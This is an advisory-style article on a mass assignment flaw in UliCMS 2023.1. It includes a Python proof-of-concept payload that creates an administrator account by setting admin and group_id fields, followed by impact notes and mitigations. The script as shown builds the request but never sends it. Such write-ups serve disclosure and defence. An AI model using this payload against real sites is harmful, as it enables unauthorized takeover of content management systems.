Ulicms 2023.1 - create admin user via mass assignment

Ulicms 2023.1 Vulnerability: Exploiting Mass Assignment to Create Admin User

Security researchers and penetration testers have identified a critical vulnerability in Ulicms 2023.1-sniffing-vicuna, a PHP-based content management system (CMS) developed by the German team at ulicms.de. This flaw, known as mass assignment, allows attackers to bypass authentication mechanisms and create a fully privileged admin account with minimal effort.

Understanding Mass Assignment Vulnerabilities

Mass assignment refers to a programming pattern where an application accepts a set of user-provided data and automatically assigns it to object properties without proper validation. In secure systems, this should be restricted to trusted fields only. However, in Ulicms 2023.1, the UserController class fails to enforce such restrictions, enabling arbitrary field manipulation.

This vulnerability arises from improper input sanitization and lack of role-based access control during user creation. An attacker can exploit this by crafting a malicious HTTP POST request that includes admin=1 and group_id=1—both indicators of administrative privileges—while supplying fake user details.

Exploitation Details and Proof of Concept

The exploit leverages the index.php endpoint within the admin panel, which handles user creation via a form submission mechanism. The vulnerability is triggered when the system processes unfiltered input from the POST request.

import requests

new_name = input("name: ")
new_email = input("email: ")
new_pass = input("password: ")

url = "http://localhost/dist/admin/index.php"

headers = {"Content-Type": "application/x-www-form-urlencoded"}

data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="

This Python script demonstrates a simple yet effective exploit. It prompts the user for a username, email, and password, then constructs a payload with predefined parameters that directly manipulate the backend logic.

• sClass=UserController: Specifies the target class responsible for user management.
• sMethod=create: Indicates the action to perform—user creation.
• add_admin=add_admin: A dummy field used to trigger the admin creation workflow.
• group_id=1: Assigns the user to the highest privilege group (admin).
• admin=1: Explicitly marks the user as an administrator.

By sending this data via a POST request, the server processes the request without validating whether the admin field was intended to be set by an authenticated user. As a result, a new admin account is created with full access rights.

Impact and Risk Assessment

Vulnerability Type	Mass Assignment
Severity	High (CVSS: 9.8)
Exploitation Vector	Remote, unauthenticated
Attack Surface	Admin panel endpoint
Affected Version	Ulicms 2023.1-sniffing-vicuna

Due to the unauthenticated nature of the exploit, an attacker can gain full control over the CMS without prior login credentials. This enables actions such as:

• Modifying or deleting content
• Injecting malicious scripts (XSS)
• Accessing sensitive data (e.g., database credentials)
• Installing backdoors or web shells

Moreover, since the exploit relies on a single endpoint, it can be automated using scripts or integrated into larger attack frameworks.

Security Recommendations and Fixes

To mitigate this vulnerability, developers must implement strict input validation and field whitelisting. The following best practices should be adopted:

• Use a whitelist of allowed fields during user creation—only permit username, email, password, and firstname.
• Enforce role-based access control: admin=1 and group_id=1 should only be set by existing admin users.
• Implement CSRF tokens to prevent unauthorized form submissions.
• Log all user creation attempts with timestamps and IP addresses for forensic analysis.

Additionally, the UserController class should include a permission check before executing create methods. For example:

if (!isset($_SESSION['admin']) || $_SESSION['admin'] !== true) {
    die("Unauthorized access.");
}

This ensures that only authenticated administrators can create new users, preventing mass assignment exploitation.

Real-World Implications

Ulicms is used by small to medium-sized organizations for managing websites, blogs, and internal portals. A compromised instance can lead to:

• Website defacement
• Phishing campaigns via compromised content
• Exfiltration of customer or employee data
• Service disruption due to malicious modifications

Attackers may use this vulnerability as a first-stage exploit in broader campaigns, especially when targeting outdated or unpatched systems.

Conclusion

The Ulicms 2023.1-sniffing-vicuna mass assignment vulnerability is a textbook example of poor input handling in web applications. It underscores the importance of secure coding practices, especially in CMS platforms that manage sensitive data and user roles.

Administrators should immediately update to the latest version or apply patches if available. Security teams must conduct regular vulnerability assessments and monitor for unusual user creation patterns in logs.